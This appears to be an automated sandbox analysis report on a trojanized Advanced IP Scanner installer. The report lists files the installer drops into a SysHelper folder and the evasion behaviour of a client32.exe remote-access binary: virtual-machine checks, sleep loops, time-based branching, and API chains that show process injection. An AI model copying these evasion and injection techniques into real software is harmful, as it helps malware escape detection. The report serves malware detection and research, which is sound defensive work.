Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\printsupport\is-T9A9E.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-D0PHJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-4RR0D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\platforms\is-CJFIB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-IE1PQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-UUCTA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-5BCDU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-3K2R2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-V7TQP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-7B70A.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\platforms\qwindows.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-15NDN.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-GHBG6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-DFL4O.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-DFILP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-QAUD7.tmp	Jump to dropped file

Found evaded block containing many API calls

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision	graph_7-98624
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision	graph_7-101532
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision	graph_7-101624
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision	graph_7-101812
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision	graph_7-101860
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision

Found evasive API chain checking for process token information

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_7-98062

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	API coverage: 5.5 %
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	API coverage: 2.8 %

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_685A4F30

7_2_685A4F30

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8000	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe TID: 8064	Thread sleep time: -814500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe TID: 8068	Thread sleep time: -44400s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe TID: 8064	Thread sleep time: -1236000s >= -30000s	Jump to behavior

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Last function: Thread delayed

Uses the system / local time for branch decision (may execute only at specific dates)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_685A3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 685A3226h

7_2_685A3130

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	7_2_11123570
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	7_2_11069690
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,	7_2_1110BB80
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	7_2_11107FE0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	7_2_110BC3D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	7_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	7_2_11064E30
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_6882CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	7_2_6882CA9B
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_68830B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	7_2_68830B33
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	8_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	8_2_11123570
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	8_2_11069690
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,	8_2_1110BB80
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	8_2_11107FE0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	8_2_110BC3D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	8_2_11064E30

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: unins000.dat.1.dr	Binary or memory string: K33kSIWfuHhZXRVN/FJzyTDU56C+/GhzewmB5cCI4G/wVvY9gXQrVd1MMGCUnL90lf5H2Wi+g01xtobYeTu8MXHKUbuoLgE7H1VedSJqF5oRyKgjeLw+GGkgnq/3AG9Vd6j/wdIFZBUxzRk2n9tWtV3JwezlWhdVmLdhwNhOKeSc0832W1I60DbuB3QIM0g+o1BjY39EdCRcnuyjvwMPF8yKhjot428DnN6AH33lfvJzc5u3xzLPUvdZBfppf5Xfw5HGFvFsnwvh1vy73uPzfdaTR0/7k/bucOT4a+LMT2HMTPP/G/wkNFBZEBZmC3EGhoFhQUSmiy/DFX4KQvSlCOqhvCykIIYIUIRVJLdKA9CIbVSa9gENJj/ypqDXX+mnDtWnaBm0n2P6Mdk3dT3/TkukZflX71YLD64j4GanP0NdCfz/Uv+o/9Tg0Bc2L0xXIqhHqq/dmuo8epifpVbWLVjNsw0cGtYSbHmvMNlYbG43txjlgmPzmE8fMbVKznFnHbGV2NoeZ483p5kpzrxkXbJ8CDqYMeL6vNcjaAo5/ZH21MsMV9mJTgWRyh19Ou4Btqpm3sqNnLrToGee2EwKGHgFXfUZNjIjtpfKGenu8c94D743cjc1/gwecpGrJL/KCcM11cc6TxEyxB475lAj1c/uuH6hZVnIqeA9EpOyfX+H/qTqabyIuP/rxgqS/ZvY0CtoE44IZ8C1XpAY9myLkg+qdT0MCUgpnXZ80Jb3VfIlz5BmJrSXVooBY2bViQPwmqrdwNiL3uHYZuJ9br6a31qfq85WPPqZf0T/qP4BaSakLH10fp7tS3ZU7Rhk10bgP9P1L46cxwBxrzjTXQd+/Mb+byawoYI88uS7/1dEzBop/ijXjV2dPXkagYO1fO2dj2/HtxFD84XZKO7o2JCe0EkGk2/am/9radNI++/87qyG2E99J7IQ64f9nFcx/bh0fOk/hE944H/697+kycO1v5E0o8ia7lwe+sr7XFZ5qrDfb26m6gM54V7y73jM1HzEGT8BT8LQ8D1CkIm8O1pnI5yCvtsLNn4J2usff8588jkgmouDrCTKrEN5xFTVBrxVyaRTYaJG62ZQ7sk6La+Kl+CR+ioRQT6X8Cup+s5dSTbP9Bf4yf5O/C4r6LPjpkx8/yByUCMoFVYJewZBgVbBeKuqQkLsp1JzqNaSftlhbCp/+mEYYOY18eE+FjeLGdOOTUc1cZu40w630Vlb1burAl3a2pqvvmnetXCy/YoOBbCybw5awTvZQMHJ5p4ozGFH9yHnhxAQX2G5VuKpW7nBXTg3d5p5yb+DU0nge9E4/nNVuj4OLi8A1rICTKi2aiY7g3NciFrRLU1nr+SaFqlM5Q+6R2togfZQ+ASpuvr5CzTA/pT/XY1MDzNiLTqBTFScmgo+sYgwxxivOuw60fKfmARU1m5idkKn7zefmJCsDYqkwq8iqq/6Fdqw7G4UM3aVqHT9De8e1KTT3CjuD0xCOaJmz0bnk3IOODgXDyUq01dBtB5CtT9wkXnIvp5cPzFbZq+VN8zYqxojgabiLrC3DO/D+fAxydyac0F6l4h4qHRdTyO6wLPCMDjC0F7J5scjlv/TfQZVlg9qdFmwNduFNhavvWbmRka3JDPKUfCJJNB/oVwNMuUjVsRnQDTX1Zvo8fYm+8de0hrd6CDCO0iq0rrqxH0ZH0xn0d7oYOHcLuiyukcxICw71kZO1oXw3QaHFg6OJrncchXO6ZN5RiJZZKbO61norIWutqklmgv/vsig7s53b1mxm+3YRu4LdA457GfLuNLLtif3Wzqp6Fus4TZw+zki19WovcO6l09Jt5+5Qe/HuuC/cb25C6LMCXnEoNFlh0RY5dBz+Q+DkusJnj+UH4Cpq4nxmi4P+W7WvNhS8kSNgQZFgTDAZp3QIXHtR7tAJDVfaqxbpR7YhXlKrmVKFgFqVtQVQqhu1U1opvYXeFjG0Vr+o9kL3pi9oEiC+a9Q0ZhjF4eg2m/etH9D12ZgOrCkMvVCVtUGU72SPWC2waDN7pn3Ofg29EF/12rtq
Source: client32.exe, 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: VMware
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2094672398.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\v
Source: client32.exe, 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla]h*
Source: powershell.exe, 00000005.00000002.2038454722.0000000007718000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: unins000.dat.1.dr	Binary or memory string: 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
Source: client32.exe, 00000007.00000002.4192062509.0000000002F93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWLMEM
Source: client32.exe, 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: unins000.dat.1.dr	Binary or memory string: vlW10eg3sl+MnMZHcScibf4SsoNaBXhjfqaiZq2uyMZqTtoOoiQ5TTSA8EHmxWV5glfz70aBut44aVuefH6joNPjnBU4Zl9wq2zreHwW1Vu3XrNek+IdV7/YNetKuu8ah8w8M1OsDDXrgnw+hofDw+sB+rOTFYiY8I+9if53aqdjZl7eq1nIPpYjCveh/wvQLbPjabsJj6Mnn29mhNNVsgQwSTTmaokUXzqIh3/FBvYtV1ByFTUcWJBkQTtKBSY618iRlJpiF7+NqMQ/WstIOl+TWO0LuTGdTcRL6f5OKB0qzBzUVx6NyVFPxYIFSzh7GcvNgEU6Q7QbsktFvD01B2Fw723Sz5raknIS9+TaT3wWtk+AvDVQwATgTCKyqPA8GGKtLFQgSdAgdQYeKxmba0Tty9wMovjvkIAKoZ8OaOhW57JCT+umby7grsSkFBFXjuw6rUORNCGzJcrmxBlHi6k1/HKoe4XtG0uCwiAxe3eVm7/27kytBtrrZgVwUJO0npwO7WHnKaRgVB9mvHwNtha631VmCichLldbJOtjl0PK9UfUfwKYfhpiyOiebcpm+fwBGdKocKt0q+b9gPVdr633pVkeTbSut99cCKxPo1fuMgd44f5lb3Ip907w4CvJGRbkS3OLteIK5DueFhrp3BugEDXA8WwxUmPV+Izvn+5PKb6uccfrRXBXrb7Lf9aqD/ZykF3IP8GUL6EF5jzR7PPs6hRODLb4iCfYBAm4GgBDgt0meNu5NXc3ENNk9rmZSujQ7W5o9Spo9umb2GGn2WGn21Fgwb7XFOqHFWqXyTvbpVeEWQx2lVmoxc4Fe6Cu/+ULox39vlP8U2Zam+u+NdaRybn6MI5XWf9KcmBcofHU3d6QSSTAT6dBHPIHlvWRM4IpysYT3TneM/14F/fcqZ/jv9bj79d+LJcX4701tOKFEfKlMUct0aB6WmlRXrZ8JhCe+l0Q5VAK6Pzl+IsYrKxsb8byUtmiLzyc3lfiKS3wXBFiyJfgSPIsPHemIeejtsRFPTNuZ79eYyOfDkXItvp0T04ydoyh4yDLnxP7ZJWrCe8bGOoSV4+Tl6O4LvbQou8MeXIrDyZZuxmTo8NdSfS+1G7We6o5Yc/0S3vAmj411CcXH88ClUePZelaJ71qOTtM8AIW+S9QVuyneh309+RsUJtImpMIql6cR/u80USqeL1UukGb71ut9Y6JhsVIXcxeOQ3igy0Oowayn66hC7tq9VvbmwLCnDnPuASRuwJe7YSLNMbEVA7VZdK40xQCzCL5gFuG3CbYYjZNgOZ1iaJyQrmu/gFMh2G+b2J9zw5uIQ7CJOERTpO1qdGTk1Ykj6YSVal65mC21dPfrYNV6Jn7+jUv/G/+K242mBGwptdnkRYuBRASP+0aTjFrlYXcSCb+wDQ9XDHY24mK94GZDL6Y1IjR9CdH0xN7jEYezbEBmt/Lb9lDoD69MifjD+/Si3/aHh/L/pVH2